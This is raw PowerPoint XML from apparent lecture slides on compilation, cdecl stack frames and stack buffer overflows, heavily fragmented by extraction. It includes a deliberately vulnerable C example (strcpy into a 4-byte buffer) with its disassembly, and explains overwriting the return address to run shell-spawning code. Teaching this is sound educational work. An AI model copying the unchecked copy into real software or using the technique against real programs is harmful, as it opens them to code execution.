          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The program is passed to an interpreter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The program might be translated into an intermediate representation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Python byte-code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Each instruction is parsed and executed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In most interpreted languages it is possible to generate and execute code dynamically</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bash: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &lt;string&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Python: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(&lt;string&gt;)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JavaScript: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(&lt;string&gt;)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1153624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0x28</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0x804839a</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42133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1285892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0x28</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0x804839a</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42133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6889474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0x28</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0x804839d</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6865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084027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0x32</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0x804839d</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6865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8380821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0x32</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9608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034727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9608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599801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1068252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0093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741514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11400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Compilation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The preprocessor expands the code to include definitions, expand macros</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GNU/Linux: The C preprocessor is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>cpp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The compiler turns the code into architecture-specific assembly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GNU/Linux: The C compiler is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> -S </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>prog.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>will generate the assembly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>m32 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>option to generate 32-bit assembly</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="147874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869461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0820973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3997786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3513063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47040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553209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47040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88756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0x80483c2</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49874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66653815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0x80483c2</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49874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2509733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34253762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4759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Compilation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The assembler turns the assembly into a binary object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GNU/Linux: The assembler is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>as</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A binary object contains the binary code and additional metadata</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Relocation information about things that need to be fixed once the code and the data are loaded into memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Information about the symbols defined by the object file and the symbols that are imported from different objects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Debugging information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="52053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2969614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67701248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2771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811810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0x33</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atin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xa</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latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x80483c6</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55269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2771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211507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42" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stack Overflows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="436243" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data is copied without checking boundaries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data "overflows" a pre-allocated buffer and overwrites the return address (or other parts of the frame)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Normally this causes a segmentation fault</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If correctly crafted, it is possible overwrite the return address with a user-defined value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is possible to cause a jump to user-defined code (e.g., code that invokes a shell)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The code may be part of the overflowing data (or not)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The code will be executed with the privileges of the running program</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="85170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6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6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6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6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6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624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6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of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Cdecl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Saved EBP and saved EIP are stored on the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What prevents a program/function from writing/changing those values?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What would happen if they did?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>125</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="105876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5464070"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>#include </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>string.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>#include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">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mycpy</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char* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>str</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char</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foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[4];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strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(foo, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>str</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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="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mycpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>asu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>cse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 340 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 2015 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>rocks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>!</a:t>
            </a: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printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>("After");   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"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126</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5068261" y="29782"/>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900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mycpy</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push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solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sub $0x28,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%esp</a:t>
            </a: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0x8(</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eax</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%eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,0x4(</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lea -0xc(</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eax</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eax</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call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent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leave</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ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>main</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push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ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sub $0x10,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%esp</a:t>
            </a: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movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0x8048504,(</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call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mycpy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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$0x8048517,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</a:t>
            </a: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eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="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call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
